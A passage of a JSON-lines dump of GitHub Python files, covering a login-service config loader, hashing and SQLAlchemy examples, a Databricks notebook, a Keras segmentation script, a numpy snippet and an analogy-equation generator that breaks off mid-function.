sect=ss))\n continue\n\n cfg[CF_BACKENDS][ss] = backend.DEFAULTS\n\n cfg[CF_BACKENDS][ss][CF_BACKEND] = ini[ss][CF_BACKEND]\n cfg[CF_BACKENDS][ss][CF_ID] = ss\n cfg[CF_BACKENDS][ss][CF_MODULE] = backend\n\n if hasattr(backend, 'cfgparse'):\n cfgparse = backend.cfgparse\n else:\n cfgparse = return_false\n\n copy_settings(ini[ss],cfg[CF_BACKENDS][ss],cfgparse,'backend {sect}'.format(sect=ss))\n continue\n\n if ss in cfg:\n sys.stderr.write('Conflicting section name {sect} in {filename}\\n'.format(\n sect = ss,\n filename = args.config))\n continue\n\n cfg[ss] = dict(ini[ss])\n\n if not args.cfv is None:\n #\n # Command line configuration\n #\n for cfv in args.cfv:\n if '=' in cfv:\n key, val = cfv.split('=',1)\n else:\n key = cfv\n val = None\n if '.' in key:\n sect_name, key = cfv[0]\n if sect_name in cfg[CF_PROVIDERS]:\n sect = cfg[CF_PROVIDERS][sect_name]\n if sect_name in cfg[CF_BACKENDS]:\n sect = cfg[CF_BACKENDS][sect_name]\n elif sect_name in cfg:\n if not isinstance(cfg[sect_name],dict):\n sect = cfg[sect_name]\n else:\n sys.stderr.write('section {sect} in {cfv} is not allowed\\n'.format(\n sect=sect_name, cfv=cfv))\n continue\n else:\n sys.stderr.write('section {sect} in {cfv} does not exist\\n'.format(\n sect=sect_name, cfv=cfv))\n continue\n else:\n sect = cfg\n if not key in sect:\n sys.stderr.write('key {key} in {cfv} does not exist\\n'.format(\n key=key, cfv=cfv))\n continue\n\n if isinstance(sect[key],int):\n sect[key] = int(val)\n elif isinstance(sect[key],float):\n sect[key] = float(val)\n elif isinstance(sect[key],bool):\n # We do this to keep things consistent...\n tmp = configparser.ConfigParse()\n tmp[key] = { key: val }\n sect[key] = tmp[key].getboolean(key)\n elif isinstance(sect[key],str) or sect[key] is None:\n sect[key] = val\n else:\n sys.stderr.write('Unconfigurable key {key} in {cfv}\\n'.format(\n key=key, cfv=cfv))\n\n #\n # Initialize providers...\n #\n if len(cfg[CF_PROVIDERS]) == 0:\n sys.stderr.write('No login providers configured\\n')\n sys.exit(1)\n for prid in cfg[CF_PROVIDERS]:\n module = cfg[CF_PROVIDERS][prid][CF_MODULE]\n module.cfg = cfg\n if hasattr(module,'init'): module.init(cfg[CF_PROVIDERS][prid])\n\n #\n # Initialize backends...\n #\n fails = []\n for beid in cfg[CF_BACKENDS]:\n module = cfg[CF_BACKENDS][beid][CF_MODULE]\n if not hasattr(module,'init'): continue\n if module.init(beid,cfg[CF_BACKENDS][beid],cfg): continue\n fails.append(beid)\n\n for beid in fails: del cfg[CF_BACKENDS][beid]\n\n if len(cfg[CF_BACKENDS]) == 0:\n sys.stderr.write('No backends configured\\n')\n sys.exit(1)\n\n #\n # Command line arguments\n #\n if not args.listen is None: cfg[CF_LISTEN] = args.listen\n if not args.port is None: cfg[CF_PORT] = int(args.port)\n if not args.logger is None:\n cfg[CF_LOG] = args.logger\n if args.logger != LOG_STDIO: cfg[CF_LOG_EX] = args.logger_data\n\n #\n # Read the fixed-ip list\n #\n if not cfg[CF_FIXED_IP_LIST] is None:\n fixedips = {}\n with open(cfg[CF_FIXED_IP_LIST],'r') as fp:\n for line in fp:\n line = line.strip()\n if '#' in line: line = line.split('#',1)[0]\n line = line.split()\n if len(line) > 1:\n fixedips[line[0]] = line[1:]\n cfg[CF_FIXED_IP_LIST] = fixedips\n\n if not cfg[CF_PROXY_LIST] is None:\n cfg[CF_PROXY_LIST] = ipacl.parse_list(cfg[CF_PROXY_LIST])\n\n #\n # Load session mgrs\n #\n cfg[RT_SESSION_MGR]['ticket'] = ticket\n cfg[RT_SESSION_MGR]['ipsess'] = ipsess\n\n if args.daemonize:\n srvio.daemonize()\n if not args.pidfile is None:\n srvio.pidfile(args.pidfile)\n\n if cfg[CF_LOG] == LOG_SYSLOG:\n srvio.syslog_io(cfg[CF_LOG_EX])\n elif cfg[CF_LOG] == LOG_FILE:\n srvio.filelog_io(cfg[CF_LOG_EX])\n srvio.unbuffered_io()\n\n cfg[CF_TEMPLATE_PATH] = cfg[CF_TEMPLATE_PATH].split(':')\n\n\n","repo_name":"TortugaLabs/autonom","sub_path":"ini.py","file_name":"ini.py","file_ext":"py","file_size_in_byte":8323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14250302878","text":"# File: MyHashCode.py\r\n\r\n# Since Python 3.2.3\r\n#import os\r\n#print(os.environ['PYTHONHASHSEED'])\r\n#print(os.environ)\r\n\r\n# Changes EACH RUN!\r\nprint(\"a\".__hash__())\r\nprint(hash(\"a\"))\r\n\r\n# Work Around:\r\nimport zlib\r\nzBytes = bytes(\"a\",\"utf8\") # more later!\r\nprint(\"Classic:\",\r\n zlib.crc32(zBytes) )\r\n\r\n# Work Around:\r\nimport hashlib\r\nzBytes = bytes(\"a\",\"utf8\") # more later!\r\nprint(\"hashlib:\",\r\n hashlib.md5(zBytes).hexdigest() )\r\n\r\n","repo_name":"soft9000/Python1000","sub_path":"Python1100/Study/MyHashCode.py","file_name":"MyHashCode.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39788266949","text":"__author__ = 'yo'\n# from flask_sqlalchemy import SQLAlchemy\n# from . import db\nfrom datetime import datetime\n# class file_art(db.Model):\nfrom sqlalchemy import Column, String, create_engine,Integer,Text,DateTime\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\n# from sqlalchemy.orm import sessionmaker,scoped_session\n# from sqlalchemy import create_engine\n# engine = create_engine(DATABASE_URI, convert_unicode=True, pool_size=50, pool_recycle=3600)\n# session = scoped_session(sessionmaker(autocommit=True, autoflush=False, bind=engine))\n# db.session = session()\n#\n# db = SQLAlchemy()\n\n# 创建对象的基类:\nBase = declarative_base()\n\ndef content_DB(Base):\n __tablename__ = 'contentdb'\n id=\"\"\n title=\"\"\n description=\"\"\n keywords=\"\"\n author=\"\"\n content=\"\"\n category=\"\"\n counter=\"\"\n date=\"\"\n srcurl=\"\"\n\ndef src_DB(Base):\n __tablename__ = 'srcdb'\n id=Column(Integer, primary_key=True, autoincrement=True)\n url=Column(String(512), nullable=True, comment=\"\")\n content=Column(Text, nullable=True, comment=\"\")\n title=Column(String(512), nullable=True, comment=\"\")\n uptime=Column(DateTime, index=True, default=datetime.now)\n\n __table_args__ = {\n \"mysql_charset\": \"utf8\"\n }\n\n# 定义User对象:\nclass User(Base):\n # 表的名字:\n __tablename__ = 'user'\n\n # 表的结构:\n id = Column(String(20), primary_key=True)\n name = Column(String(20))\n\n# 初始化数据库连接:\nengine = create_engine('mysql+mysqlconnector://root:password@host:3306/arts')\n# 创建DBSession类型:\nDBSession = sessionmaker(bind=engine)\n\n# 创建Session:\nsession = DBSession()\n# 创建Query查询,filter是where条件,最后调用one()返回唯一行,如果调用all()则返回所有行:\n# user = session.query(User).filter(User.id=='5').one()\n# 打印类型和对象的name属性:\n# print 'type:', type(user)\n# print 'name:', user.name\n# 关闭Session:\nsession.close()","repo_name":"shuo502/ipscan","sub_path":"dbmodels.py","file_name":"dbmodels.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20143094731","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC All notebooks from day 1 should run in any order once the `producer` has been started.\n# MAGIC \n# MAGIC For later notebooks, this notebook can be used to declare all tables and load all data ingested through the `AutoLoader` and `COPY INTO` lessons.\n# MAGIC \n# MAGIC To recreate all tables from a fresh start:\n# MAGIC 1. Run all in the producer notebook\n# MAGIC 1. Run all in this notebook\n# MAGIC 1. Run all in the schedule_streaming_jobs notebook (pass the value `True` to the `once` widget)\n# MAGIC 1. Run all in the schedule_batch_jobs notebook\n\n# COMMAND ----------\n\n# MAGIC %run ./ade-setup\n\n# COMMAND ----------\n\n# MAGIC %run ./table-declaration\n\n# COMMAND ----------\n\n# MAGIC %run ./gym-mac-log-prep\n\n# COMMAND ----------\n\n# register_users\nspark.sql(f\"\"\"\nCOPY INTO registered_users\nFROM '{URI}/user-reg'\nFILEFORMAT = JSON\n\"\"\")\n\n# COMMAND ----------\n\n# user_lookup\nsalt = \"BEANS\"\n\nspark.sql(f\"\"\"\nINSERT INTO user_lookup\nSELECT sha2(concat(user_id,\"{salt}\"), 256) AS alt_id, device_id, mac_address, user_id\nFROM registered_users\n\"\"\")\n\n# COMMAND ----------\n\n# gym_mac_logs\ndef load_gym_logs():\n (spark.readStream.format(\"cloudFiles\")\n .option(\"cloudFiles.format\", \"json\")\n .schema(\"first_timestamp DOUBLE, gym BIGINT, last_timestamp DOUBLE, mac STRING\")\n .load(gym_mac_logs)\n .writeStream\n .format(\"delta\")\n .option(\"checkpointLocation\", Paths.gymMacLogsCheckpoint)\n .trigger(once=True)\n .start(Paths.gymMacLogs)\n .awaitTermination())\n \nNewFile.arrival(continuous=True)\nload_gym_logs()\n\n","repo_name":"zubair527/advanced-data-engineering-with-databricks","sub_path":"Advanced-Data-Engineering-with-Databricks/Includes/catch-up.py","file_name":"catch-up.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"21567627269","text":"import os\nimport time\nfrom functools import partial\nfrom multiprocessing import Pool, cpu_count\n\nimport fire\nimport numpy as np\nimport pandas as pd\nfrom neuralprophet import NeuralProphet\n\nfrom src.data import get_data\n\n\ndef convert_dates(index, df, horizon, freq, seasonality, dataset, group): \n if dataset == 'M4' and group == 'Yearly':\n #yearly dataset has too long series\n #see https://eng.uber.com/m4-forecasting-competition/\n df = df.tail(60)\n df['ds'] = pd.date_range(end='2018-01-01', periods=df.shape[0], freq=freq)\n return df\n\ndef main(dataset: str = 'M3', group: str = 'Other') -> None:\n train, horizon, freq, seasonality = get_data('data/', dataset, group)\n if dataset == 'M4':\n #add date to this dataset\n partial_convert_dates = partial(convert_dates, horizon=horizon, freq=freq,\n seasonality=seasonality, \n dataset=dataset, group=group)\n with Pool(cpu_count()) as pool:\n train = pool.starmap(partial_convert_dates, train.groupby('unique_id'))\n train = pd.concat(train)\n else:\n train['ds'] = pd.to_datetime(train['ds'])\n train = train.rename(columns={'unique_id': 'ID'})\n\n start = time.time()\n if dataset == 'ERCOT':\n m = NeuralProphet(\n n_forecasts=24,\n n_lags=7*24,\n learning_rate=0.01,\n num_hidden_layers=1,\n d_hidden=16,\n\t)\n regions = list(train)[1:-2]\n m = m.add_lagged_regressor(names=regions)#, only_last_value=True)\n m = m.highlight_nth_step_ahead_of_each_forecast(24)\n else:\n m = NeuralProphet(n_lags=max(horizon, seasonality), n_forecasts=horizon)\n metrics = m.fit(train, freq=freq)\n future = m.make_future_dataframe(df=train, periods=horizon)\n forecasts = m.predict(df=future, decompose=False)\n end = time.time()\n print(end - start)\n\n forecasts = forecasts.groupby('ID').tail(horizon)\n forecasts['yhat'] = forecasts.filter(regex='yhat*').max(axis=1)\n forecasts = forecasts.filter(items=['ID', 'ds', 'yhat'])\n forecasts.columns = ['unique_id', 'ds', 'neuralprophet']\n forecasts.to_csv(f'data/neuralprophet-forecasts-{dataset}-{group}.csv', index=False)\n\n time_df = pd.DataFrame({'time': [end - start], 'model': ['neuralprophet']})\n time_df.to_csv(f'data/neuralprophet-time-{dataset}-{group}.csv', index=False)\n\n\nif __name__ == '__main__':\n fire.Fire(main)\n","repo_name":"Nixtla/statsforecast","sub_path":"experiments/neuralprophet/src/neuralprophet.py","file_name":"neuralprophet.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":3199,"dataset":"github-code","pt":"37"} +{"seq_id":"29440996339","text":"import sys\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport tensorflow.keras.backend as K\n\n\nIMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS = 256, 256, 3\ncategories = [\n ( 0, 0, 0), \n (244, 35,232), \n (128, 64,128),\n ( 70, 70, 70),\n (153,153,153),\n (107,142, 35),\n ( 70,130,180),\n (220, 20, 60), \n ( 0, 0,142)\n]\nclass_weights = [\n 1.0127322460863948,\n 2.6085443999046314,\n 0.31666787465874224,\n 0.5282767855660234,\n 9.547994201504986,\n 0.7136052450682393,\n 4.016557513088011,\n 6.336719440431782,\n 1.5025437504442105\n]\n\ndef one_hot_to_colors(mask):\n new_mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype='int32')\n for i in range(IMG_HEIGHT):\n for j in range(IMG_WIDTH):\n new_mask[i, j, :] = categories[np.argmax(mask[i][j])]\n return new_mask\n\n\ndef dice_coef(y_true, y_pred, smooth=1e-7):\n y_true = tf.cast(y_true, tf.float32)\n y_pred = tf.cast(y_pred, tf.float32)\n\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n dice = (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n return dice\n\nclass DiceCoefLoss(tf.keras.losses.Loss):\n def __init__(self, class_weights=[]):\n super(DiceCoefLoss, self).__init__()\n self.class_weights = class_weights\n\n def get_weight_multiplier(self, y_true):\n axis = -1\n classSelectors = K.argmax(y_true, axis=axis)\n classSelectors = tf.cast(classSelectors, 'int32')\n classSelectors = [K.equal(i, classSelectors) for i in range(len(self.class_weights))]\n classSelectors = [tf.cast(x, 'float32') for x in classSelectors]\n\n weights = [sel * w for sel,w in zip(classSelectors, self.class_weights)]\n weightMultiplier = weights[0]\n\n for i in range(1, len(weights)):\n weightMultiplier = weightMultiplier + weights[i]\n\n return weightMultiplier\n \n def loss(self, y_true, y_pred, smooth=1e-7):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n\n intersection = K.sum(y_true_f * y_pred_f)\n dice = (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n return 1 - dice\n\n def call(self, y_true, y_pred):\n y_true = tf.cast(y_true, tf.float32)\n y_pred = tf.cast(y_pred, tf.float32)\n loss = self.loss(y_true, y_pred) \n if self.class_weights:\n weightMultiplier = self.get_weight_multiplier(y_true)\n\n loss = tf.math.reduce_sum(loss * weightMultiplier)\n return loss\n return loss\n\n\n\nif __name__ == '__main__':\n try:\n img_path = sys.argv[1]\n except:\n print(\"You have to pass a file path\")\n\n model = tf.keras.models.load_model('unet_vgg19_backbone_30_epochs.h5', compile=False)\n model.compile(optimizer=tf.keras.optimizers.Adam(), \n loss=DiceCoefLoss(class_weights),\n # loss = weighted_loss(dice_coef_loss, class_weights),\n metrics=[dice_coef, tf.keras.metrics.CategoricalAccuracy()])\n\n image = cv2.imread(img_path)\n cv2.imshow(\"Original image\", image)\n \n original_size = image.shape[:2][::-1]\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = cv2.resize(image, (256, 256))\n image = np.array(image).astype('float32')\n image /= 255.\n\n predicted_mask = model.predict(np.expand_dims(image, axis=0))[0]\n predicted_mask = one_hot_to_colors(predicted_mask)\n predicted_mask = predicted_mask.astype(np.uint8)\n predicted_mask = cv2.cvtColor(predicted_mask, cv2.COLOR_RGB2BGR)\n predicted_mask = cv2.resize(predicted_mask, original_size)\n\n\n cv2.imshow(\"Predicted mask\", predicted_mask)\n\n cv2.waitKey()\n ","repo_name":"jakubdulas/cityscape-segmentation-for-self-driving-cars","sub_path":"segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22895951955","text":"# height and weight are available as a regular lists\nheight = [43, 53, 65, 54, 62, 99]\n\n# Import numpy\nimport numpy as np\n\n# Calculate the BMI: bmi\nnp_height_m = np.array(height) * 0.0254\nnp_weight_kg = np.array(weight) * 0.453592\nbmi = np_weight_kg / np_height_m ** 2\n\n# Create the light array\nlight = bmi < 21\n\n# Print out light\nprint(light)\n\n# Print out BMIs of all baseball players whose BMI is below 21 | Subsetting\nprint(bmi[light])\n","repo_name":"eightynine89/machine-learning-research","sub_path":"introduction/numpy/python/4.boolean_array.py","file_name":"4.boolean_array.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"10956311797","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nimport argparse\nimport gzip\nimport math\nimport multiprocessing\nimport sys\nimport time\nfrom collections import defaultdict\nfrom itertools import product, repeat\n\nimport matplotlib.pyplot as plt\n\nfrom neural_nlg_solver import AnalogyAlignment\nfrom neural_nlg_solver.AnalogyEquation import AnalogyEquation\n\nplt.style.use('ggplot')\n\n###############################################################################\n\n__author__ = 'KAVEETA Vivatchai '\n\n# __date__, __version__ = '10/01/2017', '0.1' # First version\n# __date__, __version__ = '11/01/2017', '0.2' # Fix progressbar\n# __date__, __version__ = '12/01/2017', '0.3' # Multiprocessing\n# __date__, __version__ = '13/01/2017', '0.4' # Fix combination algorithm, Doctest\n# __date__, __version__ = '14/01/2017', '0.5' # File writer thread, filtering\n# __date__, __version__ = '15/01/2017', '0.6' # Cluster limit\n# __date__, __version__ = '16/01/2017', '0.7' # Fix leaky thread bug,\n# # Option to read clusters file\n# # New doctests\n# __date__, __version__ = '17/01/2017', '0.8' # Fix doctest\n# __date__, __version__ = '19/01/2017', '0.9' # AnalogyRatio and AnalogyCluster classes\n# __date__, __version__ = '27/01/2017', '1.0' # Fix generation bugs\n# __date__, __version__ = '10/02/2017', '1.1' # On the fly gzipping, fix doctests\n# __date__, __version__ = '11/02/2017', '2.0' # Version 2: major overhaul.\n# # Formalize and separate generation functions\n# # Remove clustering. Add inserting\n# __date__, __version__ = '15/02/2017', '2.1' # Proper inserting and casting functions\n# # Seperate base analogy loops to reduce memory usage\n# __date__, __version__ = '17/02/2017', '2.2' # Memory optimization for fix_len arguments\n# __date__, __version__ = '18/02/2017', '2.3' # Implement new multi-processing\n# __date__, __version__ = '10/03/2017', '2.4' # Non-uniform fixed length and variable length\n# __date__, __version__ = '28/03/2017', '2.5' # Fix inserting bug\n# __date__, __version__ = '05/04/2017', '2.6' # Single thread fallback. Temporary use single thread as default\n# __date__, __version__ = '06/04/2017', '2.7' # Filter only unique analogies\n# __date__, __version__ = '16/04/2017', '2.8' # Fix memory for multi-thread mode, finally\n# # Default to multi thread mode\n__date__, __version__ = '05/05/2017', '2.9' # Fix severe bug in casting (suffix in C). Redo all experiments ;o;\n\n__description__ = 'Generate analogy equations from list of base analogies'\n\n\n# IDEA: Hashing filter?\n\n# IDEA: Each loop generate by every methods\n# : Save the analogy which have the target length to output list\n# : Other compare to before list remove any duplication (after set - before set)\n# : Do until all the list is empty\n\n###############################################################################\n\ndef read_argv():\n program = 'v%s (c) %s %s' % (__version__, __date__.split('/')[2], __author__)\n description = __description__\n\n parser = argparse.ArgumentParser(prog=program, description=description)\n\n # Required arguments\n parser.add_argument('file', action='store', help='an input file contains list of analogies')\n parser.add_argument('length', action='store', type=int, default=[8], help='string lengths (1 or 4 items)',\n nargs='*')\n\n # Generating arguments\n parser.add_argument('-vl', '--var-length', action='store_true', dest='var_length', default=False,\n help='give all variable length analogies as results')\n parser.add_argument('-m', '--methods', action='store', dest='methods', default='pmric',\n help='methods to run (default: pmric), r = reduplicating, p = permuting, m = mirroring, '\n 'i = inserting, c = casting')\n\n # Output arguments\n parser.add_argument('-o', '--out', action='store', dest='output', default='sys.stdout', help='output path')\n\n # Miscellaneous arguments\n parser.add_argument('-j', '--threads', action='store', type=int, dest='threads',\n default=multiprocessing.cpu_count(), help='number of processing threads')\n parser.add_argument('-g', '--graph', action='store_true', dest='graph', default=False,\n help='display statistical chart after generation')\n parser.add_argument('-v', '--verbose', action='store_true', dest='verbose', default=False, help='verbose mode')\n\n tmp_args = parser.parse_args()\n\n if len(tmp_args.length) != 1 and len(tmp_args.length) != 4:\n print('Error: length must be either 1 or 4 items(s)', file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n return tmp_args\n\n\n###############################################################################\n\ndef read_nlg_file(in_path):\n \"\"\"\n Read in analogies from input file.\n Assuming standard format as each line contains one analogical equation separated by ' : ' and ' :: '\n ex.- a : b :: c : d\n :param in_path: input file path contains list of analogical equations, one per each line\n \"\"\"\n\n nlgs = []\n\n # Start timer\n start_time = time.time()\n\n if args.verbose:\n print('\\nRead analogies from: {}'.format(in_path), file=sys.stderr)\n\n # Open file to read\n if '.gz' in in_path:\n in_file = gzip.open(in_path, 'rt', encoding='utf8')\n else:\n in_file = open(in_path, 'r', encoding='utf8')\n\n # with open(in_path) as in_file:\n for line in in_file.readlines():\n\n # Create new analogy object\n new_eq = AnalogyEquation(line.rstrip())\n\n # Pre-filter input equations. Ignore invalid equation\n if new_eq:\n nlgs.append(new_eq)\n\n # Close file\n in_file.close()\n\n if args.verbose:\n exec_time = time.time() - start_time\n print(' - Finished in: {0:.2f} sec'.format(exec_time), file=sys.stderr)\n print(' - Number of analogies: {}'.format(len(nlgs)), file=sys.stderr)\n\n # Display string length chart\n if args.graph:\n\n # Loop all analogy\n str_len_count = defaultdict(int)\n for nlg in nlgs:\n # Average length of string in the equation\n avg_len = math.floor(sum(len(string) for ratios in nlg for string in ratios) / 4)\n str_len_count[avg_len] += 1\n\n x_data = list(str_len_count.keys())\n y_data = list(str_len_count.values())\n\n plt.title('Number of equations by average string length')\n plt.xlabel('Average length of string')\n plt.ylabel('Number of analogical equations')\n\n plt.bar(x_data, y_data)\n plt.show()\n\n return nlgs\n\n\n###############################################################################\n\ndef is_fix_len(nlg, str_len):\n \"\"\"\n Check if AnalogicalEquation is fix_len\n :param nlg: AnalogicalEquation object\n :param str_len: String lengths\n \"\"\"\n\n return len(nlg[0][0]) == str_len[0] and len(nlg[0][1]) == str_len[1] and \\\n len(nlg[1][0]) == str_len[2] and len(nlg[1][1]) == str_len[3]\n\n\ndef is_within_len(nlg, str_len):\n \"\"\"\n Check if strings in AnalogicalEquation are shorter or equal to str_len\n :param nlg: AnalogicalEquation object\n :param str_len: String lengths\n \"\"\"\n\n return len(nlg[0][0]) <= str_len[0] and len(nlg[0][1]) <= str_len[1] and \\\n len(nlg[1][0]) <= str_len[2] and len(nlg[1][1]) <= str_len[3]\n\n\n###############################################################################\n\n\ndef gen_permute(nlg, str_len, fix_len=False):\n \"\"\"\n Generate all permuted forms of the list of input equations\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in generated equations\n :param fix_len: get only fixed length equations\n \"\"\"\n\n # All equivalent combinations (8)\n eq_forms = [[0, 1, 2, 3], [0, 2, 1, 3], [1, 0, 3, 2], [1, 3, 0, 2],\n [2, 0, 3, 1], [2, 3, 0, 1], [3, 1, 2, 0], [3, 2, 1, 0]]\n\n # List of generated equations\n gen_nlgs = []\n\n # Generate all form\n for form in eq_forms:\n\n eq_nlg = AnalogyEquation(*[nlg[int(math.floor(idx / 2))][idx % 2] for idx in form])\n\n # Add to generated list\n if is_within_len(eq_nlg, str_len) and (not fix_len or is_fix_len(eq_nlg, str_len)):\n gen_nlgs.append(eq_nlg)\n\n return gen_nlgs\n\n\ndef gen_mirror(nlg, str_len, fix_len=False):\n \"\"\"\n Mirror analogy equation\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in generated equations\n :param fix_len: get only fixed length equations\n \"\"\"\n\n # List of generated equations\n gen_nlgs = []\n\n # Append normal form\n if is_within_len(nlg, str_len) and (not fix_len or is_fix_len(nlg, str_len)):\n gen_nlgs.append(nlg)\n\n mirrored_nlg = AnalogyEquation()\n for ratio_idx, str_idx in product([0, 1], [0, 1]):\n mirrored_nlg[ratio_idx][str_idx] = nlg[ratio_idx][str_idx][::-1]\n\n # Add to generated list\n if is_within_len(mirrored_nlg, str_len) and (not fix_len or is_fix_len(mirrored_nlg, str_len)):\n gen_nlgs.append(mirrored_nlg)\n\n return gen_nlgs\n\n\ndef gen_redup(nlg, str_len, fix_len=False):\n \"\"\"\n Reduplicate equations to maximum length\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in generated equations\n :param fix_len: get only fixed length equations\n \"\"\"\n\n # List of generated equations\n gen_nlgs = []\n\n # Calculate maximum reduplication number\n max_redup = int(math.floor(min(str_len[0] / len(nlg[0][0]), str_len[1] / len(nlg[0][1]),\n str_len[2] / len(nlg[1][0]), str_len[3] / len(nlg[1][1]))))\n\n for redup_id in range(1, max_redup + 1):\n\n # Create a new AnalogyEquation\n duped_nlg = AnalogyEquation()\n\n for ratio_idx, str_idx in product([0, 1], [0, 1]):\n\n # Build new list of symbols = new string\n new_string = []\n for symbol in nlg[ratio_idx][str_idx]:\n new_string.extend([symbol] * redup_id)\n\n # Set new string to new AnalogyEquation\n duped_nlg[ratio_idx][str_idx] = new_string\n\n # Add to generated list\n if not fix_len or is_fix_len(duped_nlg, str_len):\n gen_nlgs.append(duped_nlg)\n\n return gen_nlgs\n\n\ndef gen_insert(nlg, str_len, fix_len=False):\n \"\"\"\n Inserting equations to maximum length\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in generated equations\n :param fix_len: get only fixed length equations\n :return: list of inserted equations\n \"\"\"\n\n # List of generated equations\n gen_nlgs = []\n\n # Add non-modified equation\n if is_within_len(nlg, str_len) and \\\n (not fix_len or is_fix_len(nlg, str_len)):\n gen_nlgs.append(nlg)\n\n # If shortest word is shorter than 2, pass the inserting\n if min([len(nlg[0][0]), len(nlg[0][1]), len(nlg[1][0]), len(nlg[1][1])]) < 2:\n return gen_nlgs\n\n # Calculate maximum size of insertion\n max_ins = int(math.floor(min((str_len[0] - len(nlg[0][0])) / (len(nlg[0][0]) - 1),\n (str_len[1] - len(nlg[0][1])) / (len(nlg[0][1]) - 1),\n (str_len[2] - len(nlg[1][0])) / (len(nlg[1][0]) - 1),\n (str_len[3] - len(nlg[1][1])) / (len(nlg[1][1]) - 1))))\n\n # Perform inserting\n if max_ins > 0:\n\n # List of all characters in current equation\n curr_chr = set(nlg[0][0] + nlg[0][1] + nlg[1][0] + nlg[1][1])\n\n # Get unique insertion chars\n chr_str_id = ord('0')\n ins_chr = []\n while len(ins_chr) < max_ins:\n if chr(chr_str_id) not in curr_chr:\n ins_chr.append(chr(chr_str_id))\n chr_str_id += 1\n\n # Generate all insertion chunks\n ins_chk = [[ins_chr[0]]]\n\n # Temporary list of previous length chunks\n prev_ins_chk = [[ins_chr[0]]]\n\n # Generate all the length of insert chunks\n for chr_id in range(1, max_ins):\n\n # Append a new character\n next_ins_chk = []\n for ins_chk in prev_ins_chk:\n for new_chr_id in range(len(set(ins_chk)) + 1):\n next_ins_chk.append(ins_chk + [ins_chr[new_chr_id]])\n\n # Add to final chunk list\n ins_chk.extend(next_ins_chk)\n\n # Set to previous list for next iteration\n prev_ins_chk = next_ins_chk\n\n # Finally, perform insertion\n for ins_chk in ins_chk:\n\n # New equation\n inserted_nlg = AnalogyEquation()\n\n # Insert chunk between characters\n for ratio_idx, str_idx in product([0, 1], [0, 1]):\n\n # New string (list of symbols)\n new_string = []\n\n # For each character add insertion chunk after it\n for char in nlg[ratio_idx][str_idx][:-1]:\n new_string.extend([char] + list(ins_chk))\n\n # Add last character to the end\n new_string.append(nlg[ratio_idx][str_idx][-1])\n\n # Set new string to object\n inserted_nlg[ratio_idx][str_idx] = new_string\n\n # Add to generated list\n if not fix_len or is_fix_len(inserted_nlg, str_len):\n gen_nlgs.append(inserted_nlg)\n\n return gen_nlgs\n\n\ndef gen_cast(nlg, str_len, fix_len=False):\n \"\"\"\n Casting equations to maximum length\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in generated equations\n :param fix_len: get only fixed length equations\n :return: list of casted equations\n \"\"\"\n\n # Prefix character\n pre_chr = '<'\n\n # Suffix character\n suf_chr = '>'\n\n # List of generated equations\n gen_nlgs = []\n\n # Add non-modified equation\n if is_within_len(nlg, str_len) and \\\n (not fix_len or is_fix_len(nlg, str_len)):\n gen_nlgs.append(nlg)\n\n # Loop with early breaks\n for pre_a in range(str_len[0] - len(nlg[0][0]) + 1):\n for suf_a in range(str_len[0] - len(nlg[0][0]) - pre_a + 1):\n for pre_b in range(str_len[1] - len(nlg[0][1]) + 1):\n for suf_b in range(str_len[1] - len(nlg[0][1]) - pre_b + 1):\n for pre_c in range(max(0, pre_a - pre_b),\n str_len[2] - len(nlg[1][1]) + 1):\n pre_d = pre_c + pre_b - pre_a\n if pre_d + len(nlg[1][1]) > str_len[3]:\n continue\n\n for suf_c in range(str_len[2] - len(nlg[1][0]) - pre_c + 1):\n suf_d = suf_c + suf_b - suf_a\n if pre_d + len(nlg[1][1]) + suf_d > str_len[3]:\n continue\n\n # Sanity check (should always pass)\n if pre_a >= 0 and pre_b >= 0 and pre_c >= 0 and pre_d >= 0 and suf_a >= 0 and suf_b >= 0 \\\n and suf_c >= 0 and suf_d >= 0 and pre_d + len(nlg[1][1]) + suf_d <= str_len[3]:\n\n # New equation\n casted_nlg = AnalogyEquation()\n\n casted_nlg[0][0] = ([pre_chr] * pre_a) + nlg[0][0] + ([suf_chr] * suf_a)\n casted_nlg[0][1] = ([pre_chr] * pre_b) + nlg[0][1] + ([suf_chr] * suf_b)\n casted_nlg[1][0] = ([pre_chr] * pre_c) + nlg[1][0] + ([suf_chr] * suf_c)\n casted_nlg[1][1] = ([pre_chr] * pre_d) + nlg[1][1] + ([suf_chr] * suf_d)\n\n # Add to generated list\n if not fix_len or is_fix_len(casted_nlg, str_len):\n 